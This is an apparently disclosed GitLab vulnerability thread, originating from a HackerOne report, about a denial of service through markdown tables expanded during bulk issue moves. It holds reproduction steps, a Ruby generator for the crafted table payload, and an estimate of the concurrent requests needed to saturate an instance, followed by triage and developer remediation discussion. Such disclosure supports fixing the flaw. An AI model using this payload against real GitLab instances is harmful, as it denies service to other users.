When evaluating Availability impact for a DoS that requires continuous traffic, use the 1k Reference Architecture. To assess the impact as A:H, the number of requests must be less than the "test request rate per second" and must cause unavailability of 10+ seconds that the user can perceive (see the clarifying notes).
Moving an issue with a specially crafted description, in which linear-sized input expands into a quadratically sized table, results in high CPU usage for 60 seconds (the request timeout).
The table syntax allows columns to be omitted from some of the rows. Rows with too few columns are automatically extended to the correct length. For example, each `|a|` row below gets extended to 5 columns:
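A minimal illustrative sketch of the construct (not the actual PoC payload from DoS_Move_Issues.txt):

```
| c1 | c2 | c3 | c4 | c5 |
|----|----|----|----|----|
|a|
|a|
|a|
```

When rendered, each `|a|` row is padded out to the 5 columns defined by the header, so repeating short rows against a very wide header produces a rendered table far larger than the source text suggests.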
Steps to reproduce
1. Create a project.
2. Create an issue with the crafted table description (a sketch for generating such a description follows these steps). You can skip this and use existing issues on GitLab, but this is not recommended; please use your local installation.
3. Click Bulk Edit on the Issues page and check the issue you created.
4. Click Move Selected.
5. Select the project you want to move the issue to, to trigger the DoS.
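As referenced in step 2, this is a minimal sketch of how a description of that shape could be generated for local testing; the column and row counts are illustrative assumptions, not the values used in the original DoS_Move_Issues.txt payload.

```ruby
# Build a markdown table whose header defines many columns while each body
# row supplies only one cell; the renderer pads every short row out to the
# header width, so a small amount of input text yields a very large table.
# COLUMNS and ROWS are illustrative guesses, not the original payload's values.
COLUMNS = 500
ROWS    = 500

header    = "|" + Array.new(COLUMNS, "h").join("|") + "|"
separator = "|" + Array.new(COLUMNS, "-").join("|") + "|"
body      = Array.new(ROWS, "|a|").join("\n")

File.write("crafted_description.md", [header, separator, body].join("\n"))
```

Paste the contents of crafted_description.md into the issue description in step 2, then continue with the bulk move.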
System information
System: Debian 12
Current User: git
Using RVM: no
Ruby Version: 3.1.4p223
Gem Version: 3.5.7
Bundler Version: 2.5.8
Rake Version: 13.0.6
Redis Version: 7.0.15
Sidekiq Version: 7.1.6
Go Version: unknown

GitLab information
Version: 16.11.1
Revision: 3ad2f8c9e62
Directory: /opt/gitlab/embedded/service/gitlab-rails
DB Adapter: PostgreSQL
DB Version: 14.11
URL: https://x
HTTP Clone URL: https://x/some-group/some-project.git
SSH Clone URL: git@x:some-group/some-project.git
Using LDAP: no
Using Omniauth: yes
Omniauth Providers:

GitLab Shell
Version: 14.35.0
Repository storages:
- default: unix:/var/opt/gitlab/gitaly/gitaly.socket
GitLab Shell path: /opt/gitlab/embedded/service/gitlab-shell

Gitaly
- default Address: unix:/var/opt/gitlab/gitaly/gitaly.socket
- default Version: 16.11.1
- default Git Version: 2.43.2
S:C: Impact caused to systems beyond the exploitable component (GraphQL)
This issue can cause a DoS of the GraphQL endpoint. This results in the CVSS score carrying S:C, because the vulnerable component is GitLab and the affected component is the production server (GraphQL). The move request eventually fails with the following GraphQL timeout response:
{"data":{"issueMove":null},"errors":[{"message":"Timeout on Base.issue","locations":[{"line":3,"column":5}] ,"path":["issueMove","issue"]},{"message":"Timeout on BaseMutation.errors","locations":[{"line":8,"column":5}]," path":["issueMove","errors"]}]}
Thank you for your submission. I hope you are well. Your report is currently being reviewed and the HackerOne triage team will get back to you once there is additional information to share.
Have a great day!
Kind regards,
[@]h1_analyst_indy
Comment originally created at 2024-05-02 09:55:44.172000+00:00
The current PoC shows the attacker's request failing, and a CPU core may reach 100% temporarily. However, it doesn't show any Availability impact to other users on the same instance.
Could you please provide an additional PoC to demonstrate that this finding can impact other users? Thanks!
Kind regards,
[@]h1_analyst_indy
Comment originally created at 2024-05-02 10:01:47.123000+00:00
> Could you please provide an additional PoC to demonstrate that this finding can impact other users? Thanks!
I've attached the latest proof of concept. Other users really cannot use the GitLab instance. I think this is a valid vulnerability and the report should be reopened.
Left screen: Other users (Firefox Browser)
Right screen: Attacker (Chrome)
> The current PoC shows the attacker's request failing, and a CPU core may reach 100% temporarily.
Moving 5 issues at once completely saturates all the CPU cores, and doing it repeatedly takes the instance down entirely.
moveissue.mp4
This bug can be exploited at gitlab.com
Attachments
First of all, as I have mentioned several times in your other reports, please do not attempt to test potential DoS-related issues on gitlab.com. It is prohibited. Please only perform such tests on your own GitLab instance.
I will continue to validate this report and update you on the progress.
Kind regards,
[@]h1_analyst_indy
Comment originally created at 2024-05-03 09:59:47.567000+00:00
I created 6 issues using [DoS_Move_Issues.txt](https://h1.sec.gitlab.net/a/b0c5cf41-ddc9-4ef0-9cd9-153fbc7146b4/DoS_Move_Issues.txt) as the issue description. When I moved all selected issues, I was able to see several CPU cores reach 100%:
However, I can still load any project on my test instance using the victim's account. Your PoC video doesn't show the impact to the victim either. Therefore, the current PoC doesn't appear to be causing any considerable Availability impact to other users.
If you are able to crash the server or deny a victim access to a self-hosted GitLab instance, please provide an additional PoC. Thanks!
Kind regards,
[@]h1_analyst_indy
Attachments
> I created 6 issues using DoS_Move_Issues.txt as the issue description. When I moved all selected issues, I was able to see several CPU cores reach 100%:
Yes, thank you for trying to reproduce this and confirming that the CPU cores reach 100%.
> However, I can still load any project on my test instance using the victim's account. Your PoC video doesn't show the impact to the victim either. Therefore, the current PoC doesn't appear to be causing any considerable Availability impact to other users.
It's true, moving one issue requires one CPU core. Each move will use 100% of a core for 1 minute; the denial of service comes entirely from exhausting the CPU available on your GitLab instance.
I think 20 requests to move all selected issues could lead to a complete denial of service.
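As a very rough back-of-envelope model of that claim, assuming the 1k reference architecture's 8 vCPUs and that each move pins one core for the full 60-second timeout (both figures come from earlier in this report):

```ruby
# Rough capacity model: each issue move occupies one core for ~60 seconds,
# so every batch of `VCPUS` concurrent moves keeps the whole instance saturated.
VCPUS            = 8   # 1k reference architecture
SECONDS_PER_MOVE = 60  # request timeout observed in the PoC
requests         = 20  # the reporter's estimate

full_batches      = requests / VCPUS
saturated_seconds = full_batches * SECONDS_PER_MOVE
puts "#{requests} concurrent moves keep all #{VCPUS} cores saturated for ~#{saturated_seconds}s"
# => 20 concurrent moves keep all 8 cores saturated for ~120s
```

Under this simplistic model, repeating the batch before the previous one drains keeps the instance saturated indefinitely.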
This issue is a bypass of https://hackerone.com/reports/1543584. You can see GitLab's internal team working on that issue, so please discuss it with the internal GitLab team right away to validate this report.
Comment originally created at 2024-05-03 11:20:56.534000+00:00
> If you are able to crash the server or deny a victim access to a self-hosted GitLab instance, please provide an additional PoC. Thanks!
Bear in mind that I was using an AWS EC2 instance (with the usage showing up in Billing and Cost Management), and the DoS testing wiped out my entire local instance. Can you try to reproduce it by moving more than 6 issues in parallel?
Comment originally created at 2024-05-03 11:52:37.021000+00:00
The report I sent is a bypass of the previous researcher's report, #1543584. I looked deep into the report here: #362379 (comment 946300622). Open the researcher's PoC file, recording-1652343565697.webm.
Looking at the top command output, which focuses on memory, you can see that the researcher used a machine with 8 GB of memory. This means the researcher did not follow the DoS testing recommendations (https://docs.gitlab.com/ee/administration/reference_architectures/1k_users.html: 8 vCPU and 16 GB memory), and that report was still considered valid by GitLab internally, even receiving a CVSS rating of Availability:High.
So at this stage it can be said that my report is valid, because all the DoS testing for the reports I sent used 8 vCPU and 16 GB of memory, and it is ready to be forwarded to the internal GitLab team so that the status changes to triaged. I hope that when you read my comment you can immediately forward this report to GitLab internally.
Kind regards,
Sigit S.
Attachments
Left side (attacker): Google Chrome.
Right side (victim): Mozilla Firefox.
Attacker's POV: when issues are moved repeatedly, the CPU cores spike to 100%. While the attacker's move requests are being processed, the victim gets HTTP 502 because the CPU is saturated and requests are left waiting.
Move_Issues.mp4
Victim's POV: the victim gets HTTP 502 and cannot access anything on the instance.
Kind regards,
Sigit S.
Attachments
Thank you for your reply! I'm able to reproduce the issue in your report and have submitted it to the appropriate remediation team for review. They will let us know the final ruling on this report, and when/if a fix will be implemented. Please note that the status and severity are subject to change. Thanks!
Kind regards,
[@]h1_analyst_indy
Comment originally created at 2024-05-06 11:13:07.944000+00:00
@digitalmoksha this report looks to be a bypass of #362379 (closed), which was a ReDoS vulnerability and was patched in 15.4.1.
If this is also due to ReDoS, it is out of scope (for now) for our HackerOne program and we can close this, but I wanted to get another set of eyes on it before I close it. Please advise.
This hits many filters. Some of it might be the regex patterns in those filters; the rest is a more general problem I've started seeing when we have massive amounts of HTML to update. For example, https://gitlab.com/gitlab-org/security/gitlab/-/merge_requests/3924, where there are a gazillion emojis for us to put our special HTML tags on, or #429596 (closed), which I noticed. When we have to decorate lots of HTML with our own attributes, it can really take time to complete.
This class of problem is not as easy to fix. Some cases can have limits imposed, but obviously we can't limit sanitization. We might get some relief from using the latest version of html-pipeline, which replaces the use of Nokogiri with a higher-performance Rust-backed library called Selma.
Selma's strength (aside from being backed by Rust) is that HTML content is parsed once and can be manipulated multiple times.
So there are things we can try. However, one of the difficulties of, say, using the new version of html-pipeline is that it's a bit of an upgrade, and not something I'm crazy about doing in a security patch with 3 backports.
So I don't know how you guys want to handle these...
How much effort do you think it will take to fix it "the right way"?
I notice that we have quite a lot of issues related to markdown that can cause some sort of vulnerability. Is there anything we can do to limit the impact of those DoS attacks? E.g. set a fixed time limit for every filter, or a limit for the whole pipeline? Ideally, something that would allow us to reduce all those issues to severity::4.
Do you think group::knowledge should own all the security issues related to markdown? Is there a way to split the responsibility with some other teams?
If following the security process is too costly, can we somehow fix it via the normal development process without directly exposing the vulnerability?
@digitalmoksha thanks for that analysis. So this is generally just about performance limitations in certain situations.
@cmaxim as the SC for group::project management, what are your thoughts? If this were ReDoS it would be out of scope for H1, but as it is we will be subject to SLAs to remediate it.
> How much effort do you think it will take to fix it "the right way"?
I really don't know yet; it needs more investigation. Though I would prefer a 90-day SLA versus a 60-day one.
> I notice that we have quite a lot of issues related to markdown that can cause some sort of vulnerability. Is there anything we can do to limit the impact of those DoS attacks? E.g. set a fixed time limit for every filter, or a limit for the whole pipeline? Ideally, something that would allow us to reduce all those issues to severity::4.
We do use it for, say, the SyntaxHighlighterFilter, and we can judiciously add it to other filters. But adding it to everything also just hides problems that really should be fixed.
And it can't be used for the SanitizationFilter: if we can't sanitize completely, then we can't show anything. If I can't fix a filter, then as a last resort we might have to time out the filter and abort the entire pipeline.
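A generic sketch of that last-resort idea, using plain Ruby Timeout rather than GitLab's actual pipeline code; the filter interface, constant, and error handling here are placeholders:

```ruby
require "timeout"

# Placeholder timeout value and filter interface; GitLab's real Banzai
# pipeline code differs.
FILTER_TIMEOUT_SECONDS = 5

def call_filter_with_timeout(filter, doc)
  Timeout.timeout(FILTER_TIMEOUT_SECONDS) { filter.call(doc) }
rescue Timeout::Error
  # Abort the whole pipeline rather than render partially processed
  # (and possibly unsanitized) HTML.
  raise "Markdown rendering aborted: #{filter.class} exceeded #{FILTER_TIMEOUT_SECONDS}s"
end
```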
> Do you think group::knowledge should own all the security issues related to markdown? Is there a way to split the responsibility with some other teams?
In general, yes. Most of the ones we're seeing are core pipeline/filter problems, and I do think we own those. There are exceptions; for example, for the gollum regex issue I would look to whoever owns the wiki code to fix that one.
> If following the security process is too costly, can we somehow fix it via the normal development process without directly exposing the vulnerability?
This I would like to do. For example, I would like to be able to do the html-pipeline upgrade (once I verify that it will help) in canonical, and not backport it. Backporting would be a huge amount of work, and we already have an issue tracking it: Upgrade html-pipeline to V3 (#412562).
If this vulnerability is for a feature-flag-disabled issue, regular SLOs don't apply, and it simply should be scheduled to be fixed before the feature is made generally available. If you need an exception to the SLA, follow the SLA exception procedures.
This vulnerability was rated severity::3 on 2024-05-06 and must be fixed within 90 days. To meet the remediation SLA, the change must make it into the security release before 2024-07-18 (the monthly release date before the remediation SLA).
@kmorrison1 I don't intend to ever turn off the confidentiality on that epic; it's there to manage different security issues over time. So we shouldn't need to tie the confidentiality of this issue to its epic.
@digitalmoksha Thanks, that's fine. I'd have to unlink this issue from the epic for the system to allow me to set it to public. I'm not sure if it's better to leave it linked, or to unlink it. I don't want to lose future context, but maybe it doesn't matter too much.
@kmorrison1 oh, interesting. Yeah I don't want to lose context either. But of course these need to be made public.
I tried adding the issue to related items, but you can't do that if the epic is a parent. So we can remove the epic as the parent, and then add the issue to the related links. That should give us enough context.